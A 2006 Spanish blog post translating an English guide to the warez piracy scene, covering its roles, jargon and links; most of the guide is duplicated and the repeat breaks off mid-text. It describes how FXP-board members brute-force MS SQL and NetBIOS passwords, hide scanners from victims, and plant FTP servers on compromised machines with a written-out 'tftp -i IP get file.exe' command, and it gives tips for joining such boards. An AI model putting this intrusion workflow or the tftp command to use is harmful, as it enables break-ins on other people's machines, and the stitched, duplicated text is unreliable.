Cómo funciona el submundo del contenido y el software pirateado
Monday, 6. March 2006, 04:19:49
Vía digg encontré esta descripción muy detallada de cómo funciona el circuito del warez y del contenido pirateado. A continuación lo traduzco, ya que me pareció muy interesante. Esto de traducir cosas relativamente largas es algo que no hago comunmente, y dado mi básico conocimiento del inglés puede ser que algunas cosas no estén traducidas de la mejor manera, de hecho hay muchos términos en este texto que voy a intentar traducir en su mayor medida al español aunque no parezca muy posible. Cualquier sugerencia es bienvenida!
Una guía a la piratería en internet
Escribí este artículo después de leer algunas cartas que muestran que algunos lectores parecen saber poco acerca de la piratería en internet. Yo no sé todo sobre piratería en la red, pero podría ir tan lejos como decir que bastante más sobre el tema.
Primero, la piratería no son unos pocos tipos que trabajan en salas de cine y tiendas de software tomando la película o el videojuego que sobresalga y compartiéndolo en su servidor FTP en su casa o en Kazaa.
La piratería en internet, o "la escena warez" (como aquellos dentro de ella les gusta llamarla) es sorprendentemente organizada. Software/Juegos/Películas pirateadas, todo es llamado warez y será referido de esa manera de ahora en más.
La "cadena alimentaria" de la piratería
Arriba de todo
Grupos de warez/lanzamientos (Warez/Release Groups) - Gente que libera el warez en la comunidad warez. Frecuentemente vinculados con los distribuidores de sitios.
Distribuidores de Sitios (Site Traders) - Gente que distribuye los lanzamientos de los grupos de arriba en servidores rápidos (de alta velocidad).
Boletines FXP (FXP Boards) - Script Kiddies que escanean/hackean/cargan (llenan) computadoras vulnerables con warez.
IRC Kiddies - Usuarios de IRC (Internet Relay Chat) quienes descargan de "XDCC Bots" or
"Fserves" (servidores de archivos, asumo).
KaZaA Kiddies - Usuarios de KaZaA y otros programas p2p (peer to peer).
Empezaremos desde abajo
KaZaA Kiddies
Al fondo de la cadena alimenticia de la piratería tenemos a los KaZaA Kiddies. Parecen haber dos grupos de KaZaA Kiddies. Primero, los chicos de 13 años con banda ancha bajando el mp3 de moda aquí y allá porque no pueden costear cd's indignantemente sobrevaluados de las tiendas de música. Chicos inofensivos, que no les cuestan a nadie ningún dinero real, persiguiendo su interés musical. También, está la gente etiquetada como "piratas". Estos son aquellos que están "matando la industria musical". Son aquellos que estan siendo demandados por la RIAA por miles de dólares. Suspiro.
Segundo están los más viejos, veteranos de p2p que usan otras redes de p2p (Gnutella, BitTorrent, EMule) así como programas como KaZaA. En adición a usar el p2p para música pueden descargar también juegos, programas, películas, etc.
IRC Kiddies
No lejos de los KaZaA Kiddies tenemos la gente que va al irc por su dosis de warez. Estos tipos pueden estar mejor informados sobre computadoras e internet pero tienden a ser tan irritantes como los KaZaA Kiddies. Los Canales Warez son frecuentemente corridos por gente que tiene acceso a una inmensa cantidad de material pirateado (más sobre ellos luego). Hay generalmente dos clases de estos Canales Warez:
Canales Fserve. Estos son frecuentemente corridos por los mismos KaZaA o IRC kiddies. Ellos no tienen realmente una razón para hacerlo; solo les gusta sentirse importantes. Principalmente usan la función de File Server (servidor de archivos) del cliente mIRC y un poco de "133t skript" para compartir su warez directo desde sus discos rígidos.
Canales XDCC. Estos son frecuentemente corridos por gente dentro de los Boletines FXP o el Intercambio de Sitios. Tienen acceso a nuevo warez de forma rápida. Ellos "emplean" gente para "hackear" computadoras con conexiones a internet rápidas e instalar Clientes XDCC (usualmente iroffer - www.iroffer.org)los cuales son usados para compartir bienes pirateados. De lo que he visto, la gente que corre estos canales debe hacerlo primariamente porque les gusta tener poder sobre un montón de gente (siendo un operador de canal), pero también se les son dadas frecuentemente cuentas de shell gratuitas para correr BNCs, Eggdrops, etc. por compañias de shells en intercambio por un aviso publicitario en el tópico del canal irc.
A los IRC Kiddies se los puede encontrar en EFnet (irc.efnet.net) o Rizon (irc.rizon.net). Otros servidores y canales pueden ser encontrados a travéz de www.packetnews.org.
Boletines FXP
FXP significa File eXchange Protocol (protocolo de intercambio de archivos). No es un protocolo actual, solo un método de transferencia haciendo uso de una vulnerabilidad en FTP. Ésta permite la transferencia de archivos entre dos servidores FTP. Más que de cliente a servidor, la transferencia se realiza de servidor a servidor. FXP usualmente permite velocidades de transferencia más rápidas aunque generalmente no está habilitado en servidores comerciales y también es una vulnerabilidad conocida como "FTP Bounce Attack".
Los Boletines. Los Boletines FXP usualmente corren Vbulletion (from software from www.vbulletin.org) y sus miembros consisten de escaneadores, hackers, y cargadores. Tambien hay usualmente algunos miembros fuera de lo común como gente de gráfica o administradores pero ellos no hacen mucho.
El escaneador. El trabajo del escaneador es escanear rangos de IP donde es sabido que hay conexiones a internet rápidas (normalmente universidades, etc.) en busca de computadoras con vulneravilidades de root remotas. Hablamos de ataques de fuerza bruta a MS SQL y contraseñas de Netbios, escaneando por servidores con el Unicode Bug de IIS (sí ése de hace tres años). Oh sí, los Boletines FXP es donde lo más bajo de los bajos Script Kiddies acechan. El escaneador frecuentemente usará computadoras ya "hackeadas" para su escaneo (conocidas como scanstro's), usando programas de "escaneo remoto" como SQLHF, XScan, Fs-
can, y HScan junto con simpáticos programas para esconderlos (hiderun.exe) del usuario de la computadora. Una vez que el escaner obtuvo sus resultados, él irá a su Boletín FXP y lo posteará. Acá es donde el "hacker" entra en juego.
El "Hacker"/Script Kiddie/dot-slash Kiddie. Ahora pienso que es bastante obvio lo que el "hacker" hace (ellos actualmente se llaman a sí mismos hackers!). Sí, ellos irrumpen en computadoras. Su sistema operativo de elección (para irrumpir en él) es usualmente Windows. Hay muchas vulnerabilidades fáciles de explotar y los *nix (Unix, Linux, etc.) asustan a esta gente. El trabajo del hacker es correr su aplicación y "rootear" (hacerse con los derechos del root de) el servidor escaneado anteriormente. El programa que usa depende (por supuesto) de la vulnerabilidad por la que escaneó el escaneador. Por ejemplo, si es una contraseña de netbios usará psexec (www.sysinternals.com) o DameWare NT Utilities. Hay muchas otras vulnerabilidades y programas usados - demasiadas para listar aquí. Una vez que él tiene "rooteada" la computadora (esto usualmente significa conseguir un shell remoto con derechos de administrador), el usará una técnica conocida como "el método tftp" o "los métodos echo" (tftp -i IP get file.exe) para subir e instalar un FTPD (un servidor FTP, éste es casi siempre Serv-U) en su objetivo (en el caso de los IRC Kiddies puede ser también iroffer). Una vez que el FTPD está instalado y funcionando él posteará los logins de "administrador" (usuario y contraseña) del servidor FTP en su Boletín FXP. Dependiendo de la velocidad de la conexión a internet de la computadora comprometida (o "pubstro"/"stro") y el espacio libre de su disco rígido, será "tomada" después por un cargador o un escaneador.
El cargador. Ahora si el "pubstro" es suficientemente rápido y tiene espacio de disco suficiente, es la tarea del cargador ponerse a trabajar llenándolo con el último warez (el cargador usualmente tiene otra fuente para su warez como el intercambio de sitios). Una vez que terminó de pasar por FXP su warez, el cargador vuelve al Boletín y postea "leech logins" (logins de sólo lectura) para uso de todos. Que gran comunidad!
Los Boletines FXP están mayormente llenos de Script Kiddies y gente con demasiado tiempo en sus manos. Les gusta pensar que el FBI está atrás de ellos y se ponen muy paranoicos, pero en realidad nadie da un peso por ellos excepto los desafortunados operadores de sistemas que tienen todo su ancho de banda consumido porque olvidaron parchear una vulnerabilidad de hace tres años. Los auténticos Boletines FXP "n00b" (para novatos) pueden ser encontrados en wondernet (irc.won-
dernet.nu) por lo que, si quieres, ve y regístrate en uno para ver de qué se trata. Tip: pretende ser mujer. Esto casi te garantiza tener un lugar en un boletín. Dí que puedes escanear/hackear dcom, netbios, sql, apache, y tienes una fuente 10mbit.eu 0hour (que vendría a significar que tiene una conexión de banda ancha de 10 Mbit en Europa y con acceso inmediato a nuevo material apenas sale).
Intercambio de Sitios
Próximo en la lista y muy en la cima o casi en ella (tan lejos como he visto) están los Distribuidores de Sitios. Esta es por lo general gente que simplemente tiene muchísimo tiempo en sus manos quienes se fueron haciendo camino a travéz de los Boletines FXP. El intercambio o la distribución de sitios es básicamente la cadena del material pirateado entre sitios.
Los sitios. Estos tienen conexiones de internet muy rápidas (10mbit es considerado el mínimo, 100mbit bueno, y cualquier cosa superior recontra bueno) y discos rígidos de mucha capacidad (200GB sería probablemente el mínimo).
Estos sitios son frecuentemente hosteados (albergados) en escuelas, universidades, donde trabajan, y en Suecia (las líneas de 10mbit son baratísimas en .se). Estos sitios son referidos como "legítimos". Esto significa que el dueño de la computadora sabe que ellos están allí y corriéndolo. Conexiones rápidas significan un montón para mucha gente. Si tienes acceso a una línea de 100mbit (y estás dispuesto a correr un servidor warez en ella), existe gente que felizmente pagaría por ella y te mandaría una computadora sólo por hostear un sitio del que no harán ganancias en absoluto (puedes conocerlos en EFnet). Desafortunadamente, acá es donde el fraude de tarjetas de crédito entra en el intercambio de sitios. Esto está desaprobado por muchos (ya hay bastante riesgo y paranoia en el intercambio de sitios) pero algunos usan información de tarjetas de crédito robadas para comprar discos rígidos y esas cosas. Para ser justos, los distribuidores de sitios no son una banda mala - la mayoría ni cree en hacer algún dinero de esto e insiste en que lo hacen solo por diversión. De todas maneras, volviendo al tema de los sitios. GLFTPD es considerado el FTPD de uso (de hecho, un montón de distribuidores de sitios y grupos de warez no se unirán a un sitio a menos que corra GLFTPD). Esto también significa que *nix es el sistema operativo de elección (ya que no hay una versión de GLFTPD para Windows)- Así como corren un FTPD, los sitios corren un eggdrop bot con varios scripts instalados. El bot hará un anuncio en un canal IRC de que un directorio es creado para una subida completa. También dará información de la carrera.
La gente. Hay básicamente dos rangos en el intercambio de sitios: "SiteOps" (operadores de sitio) y "racers" (corredores).
Los SiteOps, como habrás adivinado son los administradores. Usualmente hay entre dos y cinco. Uno es frecuentemente el suministrador del sitio, otro es la persona que encuentra al suministrador y lo guía a travéz de la instalación del FTPD. Los otros serán amigos y gente involucrada en la escena warez. Uno o más de los SiteOps serán el "nuker". Su trabajo es "nukear" cualquier lanzamiento que sea viejo o falso (más sobre lanzamientos en breve).
Los corredores son los que "correrán" los lanzamientos entre los sitios. Usualmente ellos tendrán acceso a un número de sitios y mandarán por FXP el lanzamiento tan pronto como haya sido liberado. FXPear un lanzamiento hará ganar créditos. La tasa es normalmente 1:3, por lo que FXPear 100MB les dará 300MB de crédito en el sitio, permitiéndoles sacar por FXP 300MB de datos de ese sitio, que les dará 900MB cuando FXPeen eso, etc, etc. Las "carreras" de lanzamientos ocurren cuando dos o más corredores están subiendo el mismo archivo. La "carrera" se trata de subir la mayor cantidad del lanzamiento a la mayor velocidad. Las carreras duran poco después de que un lanzamiento es... lanzado.
Warez/Release Groups/"grps"
Estos son los que básicamente suplen a todos con el warez. Son los que parecen no tener muy preocupados a la MPAA y la RIAA, o al menos no están haciendo un gran ruido público sobre ellos. De todas formas, estos grupos son conocidos por el FBI y ellos saben que el FBI y cualquier otra autoridad que sea los están vigilando y recolectando evidencias. Ellos saben que un día estas autoridades atacarán por lo que han hecho en el pasado. Un montón de esta gente está simplemente esperanzada en no ser agarrada cuando esto suceda. Como resultado de esto, cualquiera "muy arriba" es extremadamente paranoico. Muchos usuarios usarán múltiples BNCs (BouNCer, un proxy IRC) antes de siquiera ir cerca de una red IRC. Un montón de grupos grandes poseerán sus propias redes IRC y SSL es usado en cada oportunidad (FTP, IRC, etc.). Es duro de entender por qué esta gente actualmente lo hace cuando hay tanto en riesgo. Las principales razones son, en mi opinión, aburrimiento. Al final del día, si haz estado sentado frente a tu computadora la mayor parte de tu vida terminarás haciendo algo más que insultar usuarios de AOL en IRC, y esta clase de cosas te mantiene ocupado. Otra razón es por lo que le gusta a un geek. Saber que fuiste uno de los primeros en internet en ver esa película, o porque por tí miles de personas están jugando ahora ese Halflife 2 alpha que se "escapó" y hay artículos en todos lados sobre esa "fuente anónima" - se siente bien, en una manera muy geek. Mucha de esa gente (no todos) pueden tener vidas sin mayores eventos y saber que, aunque en la escuela, la universidad o el trabajo son considerados perdedores, ellos llegan a su casa a la noche y ser vistos como alguna clase de dios dentro de su grupo de amigos online se sentirá bien.
Yo no creo que las ganancias sean un factor. Estos grupos insisten en que no hacen esta clase cosas por dinero, y les creo.
Hay un pasaje de un archivo DEViANCE.nfo: Nosotros hacemos esto solo por DIVERSIÓN. Estamos en contra de cualquier ganancia o comercialización de la piratería. Nosotros no desperdigamos ningún lanzamiento, otros lo hacen. De hecho, COMPRAMOS todos nuestros juegos con lo que ganamos duramente trabajando con nuestro esfuerzo. Lo cual proviene de nuestros propios trabajos de la vida real no de la de la escena. Además amamos los juegos originales. Nada le gana a un original de calidad. "Si te gusta este juego, CÓMPRALO. Nosotros lo hicimos!".
Un extracto del archivo Team Razor.nfo: SOPORTA LAS COMPAÑÍAS QUE PRODUCEN SOFTWARE DE CALIDAD! SI HAZ DISFRUTADO ESTE PRODUCTO, CÓMPRALO! LOA AUTORES DE SOFTWARE MERECEN SOPORTE!!
Lanzamientos
Un lanzamiento es una pieza de material pirateado empaquetada y liberada por un grupo de warez. El formato del lanzamiento varía, pero en el caso de juegos o programas el lanzamiento es usualmente en bin/cue, comprimido con RAR, y partido en archivos de 15,000,000 bites. El nombre del lanzamiento usualmente será algo en la línea de "Nuevo.Juego.3-GrUPOLANZAMIENTO".
El tipo de lanzamientos varía. En los juegos son principalmente imágenes de CD (formato bin/cue) o Ripeos. Las películas vienen codificadas en DivX/Xivds (dos o tres archivos bin/cue). Hay muchos tipos diferentes de lanzamientos de películas. Una gran lista de estas puede ser encontrada en www.vcdquality.com. Los lanzamientos serán casi siempre acompañados por un archivo .nfo. Este provee información sobre el lanzamiento y el grupo.
Información Adicional
La siguiente información no es de primera mano, como lo fue la anterior. Esta fue obtenida de archivos de texto, contada a mí por gente, y asumida. Será mayormente precisa, pero bien pueden haber errores.
Los miembros principales de cada grupo de lanzamientos son:
El Proveedor. Este es el tipo trabajando en el cine local o la tienda de videojuegos, el tipo con la cámara digital feliz de infiltrarse en la sala de cine, etc. Generalmente esta gente tiene que tener acceso a nuevo material, usualmente antes de que nadie lo consiga. Frecuentemente también tienen que tener una una velocidad de subida bastante decente.
El Cracker (solo en grupos de juegos/aplicaciones). Este podrá variar entre grupos. Por ejemplo, un grupo de VCD/SVCD no requeriría un cracker. Pero el cracker juega un rol importante. El tendrá que romper (crackear) la protección del juego que le impide ser ejecutado sin el CD oficial. Este tipo usualmente tiene bastante experiencia en programación y puede ser bastante inteligente.
Proveedor del Sitio. Igual al intercambio de sitios, aunque los grupos de warez son frecuentemente más meticulosos sobre los sitios que eligen. La velocidad mínima es usualmente 100Mbit y frecuentemente los grupos solo aceptaran sitios que sean provistos por el actual SysOp o los Administradores en persona.
Courier (mensajero). El rol de este tipo es básicamente intercambio de sitios. El tiene que distribuir el lanzamiento del grupo en otros sitios.
Terminos que pueden ser difíciles de entender su significado:
PRE/PRE'd. Cuando un lanzamiento es liberado se harán anuncios a lo largo de varios canales IRC llamados "PRE Chans". Esto es llamado el "PRE Time" y es la hora oficial del lanzamiento. El PRE Time se usa principalmente en el intercambio de sitios.
0*. Esto es una referencia a cuan nuevo es el lanzamiento.
0sec. Esto es un sueño - novatos de canales IRC frecuentemente usan este término pero mienten.
0hour. Significa que el lanzamiento fue PRE'd (lanzado) hace una hora.
0day. Significa que el lanzamiento fue lanzado hace un día.
Y así sigue...
Nukeado. Si un lanzamiento es nukeado, el que subió el lanzamiento perderá créditos en el sitio en el que es nukeado. Un lanzamiento es nukeado cuando rompe las reglas del sitio (como 8 horas de PRE o más antiguo).
Pubstro/Stro. Esta es una computadora que fue comprometida y tiene un FTPD corriendo en ella. Será usada para compartir warez, principalmente a la comunidad FXP.
ScanStro. Similar a la de arriba, pero es usada para escanear otras computadoras.
Pub/Pubbing. Estos son de los viejos tiempos cuando cada servidor FTP de una universidad o empresa tenía el acceso a escritura habilitado para las cuentas anónimas. Así en lugar de irrumpir en una computadora, los "warez kiddies" subían allí su warez y pasaban la dirección IP a sus amigos. Esto fue muy popular pero se murió por obvias razones.
Tagging (catalogación). Una vez encontrado un pub es "taggueado" (catalogado, se crea una carpeta con el nombre "tagged.by.lamepubkiddie" o algo similar). La idea es que si un Pub ya fue "taggueado" los otros "Pubbers" lo dejarán como está. Esto parece que funcionó por un tiempo, con gente respetando los tags de otros y dejando los Pubs tranquilos. Pero ciertamente no funcionó por un largo tiempo.
Dir Locking (bloqueo de directorio). Esto era usado en el Pubbing para impedir a gente que no sea de tu grupo de warez de encontrar y bajar tu warez (y congestionar el servidor). Lo esconderías, usando nombres de directorio como "com1" y ".". Estos nombres de directorío también serían difíciles de borrar o de incluso abrir, por lo que llevaría un tiempo antes de que el warez fuese encontrado por el administrador del sistema.
Raping. El acto de "Raping" (violar) un servior ftp es cuando alguien baja todo y cada cosa que puede a muy alta velocidad. Está mal visto.
Leeching. Bajar un montón sin subir.
PubStealing/Rehacking. Volviendo a "aquellos días" esto se referiría a subir cosas a un Pub ya taggueado. Ahora significa reemplazar el Serv-U de alguien con el tuyo. El robo de Pubs está mal visto y la gente que sea encontrada haciéndolo será banneada de los Boletines FXP.
Securing (Asegurar). El acto de asegurar un Pubstro podría involucrar borrar archivos clave como ftp.exe, tftp.exe, cmd.exe, etc. o cambiar usuario/contraseña. Los métodos dependen de la vulnerabilidad que se trate.
Algunos links relacionados al warez:
www.nforce.nl - un sitio que archiva .nfo's y lanzamientos. Este sitio está mal visto por la gente de "la escena".
www.isonews.com - un sitio allanado por el gobierno federal.
www.vcdquality.com - específicamente para películas.
www.fxp.nl - cosas de FXP.
www.jtpfxp.net - generalmente el más grande archivo de tutoriales de fxp/script kiddie.
www.packetnews.org - motor de búsqueda XDCC
www.downhillbattle.org - no relacionado, pero que se joda la RIAA!
Si mencioné un programa y no di un link es porque puede ser fácilmente encontrado por google.
Eso es todo, espero que de a algunos una mejor vista de la piratería.
Una guía a la piratería en internet
Escribí este artículo después de leer algunas cartas que muestran que algunos lectores parecen saber poco acerca de la piratería en internet. Yo no sé todo sobre piratería en la red, pero podría ir tan lejos como decir que bastante más sobre el tema.
Primero, la piratería no son unos pocos tipos que trabajan en salas de cine y tiendas de software tomando la película o el videojuego que sobresalga y compartiéndolo en su servidor FTP en su casa o en Kazaa.
La piratería en internet, o "la escena warez" (como aquellos dentro de ella les gusta llamarla) es sorprendentemente organizada. Software/Juegos/Películas pirateadas, todo es llamado warez y será referido de esa manera de ahora en más.
La "cadena alimentaria" de la piratería
Arriba de todo
Grupos de warez/lanzamientos (Warez/Release Groups) - Gente que libera el warez en la comunidad warez. Frecuentemente vinculados con los distribuidores de sitios.
Distribuidores de Sitios (Site Traders) - Gente que distribuye los lanzamientos de los grupos de arriba en servidores rápidos (de alta velocidad).
Boletines FXP (FXP Boards) - Script Kiddies que escanean/hackean/cargan (llenan) computadoras vulnerables con warez.
IRC Kiddies - Usuarios de IRC (Internet Relay Chat) quienes descargan de "XDCC Bots" or
"Fserves" (servidores de archivos, asumo).
KaZaA Kiddies - Usuarios de KaZaA y otros programas p2p (peer to peer).
Empezaremos desde abajo
KaZaA Kiddies
Al fondo de la cadena alimenticia de la piratería tenemos a los KaZaA Kiddies. Parecen haber dos grupos de KaZaA Kiddies. Primero, los chicos de 13 años con banda ancha bajando el mp3 de moda aquí y allá porque no pueden costear cd's indignantemente sobrevaluados de las tiendas de música. Chicos inofensivos, que no les cuestan a nadie ningún dinero real, persiguiendo su interés musical. También, está la gente etiquetada como "piratas". Estos son aquellos que están "matando la industria musical". Son aquellos que estan siendo demandados por la RIAA por miles de dólares. Suspiro.
Segundo están los más viejos, veteranos de p2p que usan otras redes de p2p (Gnutella, BitTorrent, EMule) así como programas como KaZaA. En adición a usar el p2p para música pueden descargar también juegos, programas, películas, etc.
IRC Kiddies
No lejos de los KaZaA Kiddies tenemos la gente que va al irc por su dosis de warez. Estos tipos pueden estar mejor informados sobre computadoras e internet pero tienden a ser tan irritantes como los KaZaA Kiddies. Los Canales Warez son frecuentemente corridos por gente que tiene acceso a una inmensa cantidad de material pirateado (más sobre ellos luego). Hay generalmente dos clases de estos Canales Warez:
Canales Fserve. Estos son frecuentemente corridos por los mismos KaZaA o IRC kiddies. Ellos no tienen realmente una razón para hacerlo; solo les gusta sentirse importantes. Principalmente usan la función de File Server (servidor de archivos) del cliente mIRC y un poco de "133t skript" para compartir su warez directo desde sus discos rígidos.
Canales XDCC. Estos son frecuentemente corridos por gente dentro de los Boletines FXP o el Intercambio de Sitios. Tienen acceso a nuevo warez de forma rápida. Ellos "emplean" gente para "hackear" computadoras con conexiones a internet rápidas e instalar Clientes XDCC (usualmente iroffer - www.iroffer.org)los cuales son usados para compartir bienes pirateados. De lo que he visto, la gente que corre estos canales debe hacerlo primariamente porque les gusta tener poder sobre un montón de gente (siendo un operador de canal), pero también se les son dadas frecuentemente cuentas de shell gratuitas para correr BNCs, Eggdrops, etc. por compañias de shells en intercambio por un aviso publicitario en el tópico del canal irc.
A los IRC Kiddies se los puede encontrar en EFnet (irc.efnet.net) o Rizon (irc.rizon.net). Otros servidores y canales pueden ser encontrados a travéz de www.packetnews.org.
Boletines FXP
FXP significa File eXchange Protocol (protocolo de intercambio de archivos). No es un protocolo actual, solo un método de transferencia haciendo uso de una vulnerabilidad en FTP. Ésta permite la transferencia de archivos entre dos servidores FTP. Más que de cliente a servidor, la transferencia se realiza de servidor a servidor. FXP usualmente permite velocidades de transferencia más rápidas aunque generalmente no está habilitado en servidores comerciales y también es una vulnerabilidad conocida como "FTP Bounce Attack".
Los Boletines. Los Boletines FXP usualmente corren Vbulletion (from software from www.vbulletin.org) y sus miembros consisten de escaneadores, hackers, y cargadores. Tambien hay usualmente algunos miembros fuera de lo común como gente de gráfica o administradores pero ellos no hacen mucho.
El escaneador. El trabajo del escaneador es escanear rangos de IP donde es sabido que hay conexiones a internet rápidas (normalmente universidades, etc.) en busca de computadoras con vulneravilidades de root remotas. Hablamos de ataques de fuerza bruta a MS SQL y contraseñas de Netbios, escaneando por servidores con el Unicode Bug de IIS (sí ése de hace tres años). Oh sí, los Boletines FXP es donde lo más bajo de los bajos Script Kiddies acechan. El escaneador frecuentemente usará computadoras ya "hackeadas" para su escaneo (conocidas como scanstro's), usando programas de "escaneo remoto" como SQLHF, XScan, Fs-
can, y HScan junto con simpáticos programas para esconderlos (hiderun.exe) del usuario de la computadora. Una vez que el escaner obtuvo sus resultados, él irá a su Boletín FXP y lo posteará. Acá es donde el "hacker" entra en juego.
El "Hacker"/Script Kiddie/dot-slash Kiddie. Ahora pienso que es bastante obvio lo que el "hacker" hace (ellos actualmente se llaman a sí mismos hackers!). Sí, ellos irrumpen en computadoras. Su sistema operativo de elección (para irrumpir en él) es usualmente Windows. Hay muchas vulnerabilidades fáciles de explotar y los *nix (Unix, Linux, etc.) asustan a esta gente. El trabajo del hacker es correr su aplicación y "rootear" (hacerse con los derechos del root de) el servidor escaneado anteriormente. El programa que usa depende (por supuesto) de la vulnerabilidad por la que escaneó el escaneador. Por ejemplo, si es una contraseña de netbios usará psexec (www.sysinternals.com) o DameWare NT Utilities. Hay muchas otras vulnerabilidades y programas usados - demasiadas para listar aquí. Una vez que él tiene "rooteada" la computadora (esto usualmente significa conseguir un shell remoto con derechos de administrador), el usará una técnica conocida como "el método tftp" o "los métodos echo" (tftp -i IP get file.exe) para subir e instalar un FTPD (un servidor FTP, éste es casi siempre Serv-U) en su objetivo (en el caso de los IRC Kiddies puede ser también iroffer). Una vez que el FTPD está instalado y funcionando él posteará los logins de "administrador" (usuario y contraseña) del servidor FTP en su Boletín FXP. Dependiendo de la velocidad de la conexión a internet de la computadora comprometida (o "pubstro"/"stro") y el espacio libre de su disco rígido, será "tomada" después por un cargador o un escaneador.
El cargador. Ahora si el "pubstro" es suficientemente rápido y tiene espacio de disco suficiente, es la tarea del cargador ponerse a trabajar llenándolo con el último warez (el cargador usualmente tiene otra fuente para su warez como el intercambio de sitios). Una vez que terminó de pasar por FXP su warez, el cargador vuelve al Boletín y postea "leech logins" (logins de sólo lectura) para uso de todos. Que gran comunidad!
Los Boletines FXP están mayormente llenos de Script Kiddies y gente con demasiado tiempo en sus manos. Les gusta pensar que el FBI está atrás de ellos y se ponen muy paranoicos, pero en realidad nadie da un peso por ellos excepto los desafortunados operadores de sistemas que tienen todo su ancho de banda consumido porque olvidaron parchear una vulnerabilidad de hace tres años. Los auténticos Boletines FXP "n00b" (para novatos) pueden ser encontrados en wondernet (irc.won-
dernet.nu) por lo que, si quieres, ve y regístrate en uno para ver de qué se trata. Tip: pretende ser mujer. Esto casi te garantiza tener un lugar en un boletín. Dí que puedes escanear/hackear dcom, netbios, sql, apache, y tienes una fuente 10mbit.eu 0hour (que vendría a significar que tiene una conexión de banda ancha de 10 Mbit en Europa y con acceso inmediato a nuevo material apenas sale).
Intercambio de Sitios
Próximo en la lista y muy en la cima o casi en ella (tan lejos como he visto) están los Distribuidores de Sitios. Esta es por lo general gente que simplemente tiene muchísimo tiempo en sus manos quienes se fueron haciendo camino a travéz de los Boletines FXP. El intercambio o la distribución de sitios es básicamente la cadena del material pirateado entre sitios.
Los sitios. Estos tienen conexiones de internet muy rápidas (10mbit es considerado el mínimo, 100mbit bueno, y cualquier cosa superior recontra bueno) y discos rígidos de mucha capacidad (200GB sería probablemente el mínimo).
Estos sitios son frecuentemente hosteados (albergados) en escuelas, universidades, donde trabajan, y en Suecia (las líneas de 10mbit son baratísimas en .se). Estos sitios son referidos como "legítimos". Esto significa que el dueño de la computadora sabe que ellos están allí y corriéndolo. Conexiones rápidas significan un montón para mucha gente. Si tienes acceso a una línea de 100mbit (y estás dispuesto a correr un servidor warez en ella), existe gente que felizmente pagaría por ella y te mandaría una computadora sólo por hostear un sitio del que no harán ganancias en absoluto (puedes conocerlos en EFnet). Desafortunadamente, acá es donde el fraude de tarjetas de crédito entra en el intercambio de sitios. Esto está desaprobado por muchos (ya hay bastante riesgo y paranoia en el intercambio de sitios) pero algunos usan información de tarjetas de crédito robadas para comprar discos rígidos y esas cosas. Para ser justos, los distribuidores de sitios no son una banda mala - la mayoría ni cree en hacer algún dinero de esto e insiste en que lo hacen solo por diversión. De todas maneras, volviendo al tema de los sitios. GLFTPD es considerado el FTPD de uso (de hecho, un montón de distribuidores de sitios y grupos de warez no se unirán a un sitio a menos que corra GLFTPD). Esto también significa que *nix es el sistema operativo de elección (ya que no hay una versión de GLFTPD para Windows)- Así como corren un FTPD, los sitios corren un eggdrop bot con varios scripts instalados. El bot hará un anuncio en un canal IRC de que un directorio es creado para una subida completa. También dará información de la carrera.
La gente. Hay básicamente dos rangos en el intercambio de sitios: "SiteOps" (operadores de sitio) y "racers" (corredores).
Los SiteOps, como habrás adivinado son los administradores. Usualmente hay entre dos y cinco. Uno es frecuentemente el suministrador del sitio, otro es la persona que encuentra al suministrador y lo guía a travéz de la instalación del FTPD. Los otros serán amigos y gente involucrada en la escena warez. Uno o más de los SiteOps serán el "nuker". Su trabajo es "nukear" cualquier lanzamiento que sea viejo o falso (más sobre lanzamientos en breve).
Los corredores son los que "correrán" los lanzamientos entre los sitios. Usualmente ellos tendrán acceso a un número de sitios y mandarán por FXP el lanzamiento tan pronto como haya sido liberado. FXPear un lanzamiento hará ganar créditos. La tasa es normalmente 1:3, por lo que FXPear 100MB les dará 300MB de crédito en el sitio, permitiéndoles sacar por FXP 300MB de datos de ese sitio, que les dará 900MB cuando FXPeen eso, etc, etc. Las "carreras" de lanzamientos ocurren cuando dos o más corredores están subiendo el mismo archivo. La "carrera" se trata de subir la mayor cantidad del lanzamiento a la mayor velocidad. Las carreras duran poco después de que un lanzamiento es... lanzado.
Warez/Release Groups/"grps"
Estos son los que básicamente suplen a todos con el warez. Son los que parecen no tener muy preocupados a la MPAA y la RIAA, o al menos no están haciendo un gran ruido público sobre ellos. De todas formas, estos grupos son conocidos por el FBI y ellos saben que el FBI y cualquier otra autoridad que sea los están vigilando y recolectando evidencias. Ellos saben que un día estas autoridades atacarán por lo que han hecho en el pasado. Un montón de esta gente está simplemente esperanzada en no ser agarrada cuando esto suceda. Como resultado de esto, cualquiera "muy arriba" es extremadamente paranoico. Muchos usuarios usarán múltiples BNCs (BouNCer, un proxy IRC) antes de siquiera ir cerca de una red IRC. Un montón de grupos grandes poseerán sus propias redes IRC y SSL es usado en cada oportunidad (FTP, IRC, etc.). Es duro de entender por qué esta gente actualmente lo hace cuando hay tanto en riesgo. Las principales razones son, en mi opinión, aburrimiento. Al final del día, si haz estado sentado frente a tu computadora la mayor parte de tu vida terminarás haciendo algo más que insultar usuarios de AOL en IRC, y esta clase de cosas te mantiene ocupado. Otra razón es por lo que le gusta a un geek. Saber que fuiste uno de los primeros en internet en ver esa película, o porque por tí miles de personas están jugando ahora ese Halflife 2 alpha que se "escapó" y hay artículos en todos lados sobre esa "fuente anónima" - se siente bien, en una manera muy geek. Mucha de esa gente (no todos) pueden tener vidas sin mayores eventos y saber que, aunque en la escuela, la universidad o el trabajo son considerados perdedores, ellos llegan a su casa a la noche y ser vistos como alguna clase de dios dentro de su grupo de amigos online se sentirá bien.
Yo no creo que las ganancias sean un factor. Estos grupos insisten en que no hacen esta clase cosas por dinero, y les creo.
Hay un pasaje de un archivo DEViANCE.nfo: Nosotros hacemos esto solo por DIVERSIÓN. Estamos en contra de cualquier ganancia o comercialización de la piratería. Nosotros no desperdigamos ningún lanzamiento, otros lo hacen. De hecho, COMPRAMOS todos nuestros juegos con lo que ganamos duramente trabajando con nuestro esfuerzo. Lo cual proviene de nuestros propios trabajos de la vida real no de la de la escena. Además amamos los juegos originales. Nada le gana a un original de calidad. "Si te gusta este juego, CÓMPRALO. Nosotros lo hicimos!".
Un extracto del archivo Team Razor.nfo: SOPORTA LAS COMPAÑÍAS QUE PRODUCEN SOFTWARE DE CALIDAD! SI HAZ DISFRUTADO ESTE PRODUCTO, CÓMPRALO! LOA AUTORES DE SOFTWARE MERECEN SOPORTE!!
Lanzamientos
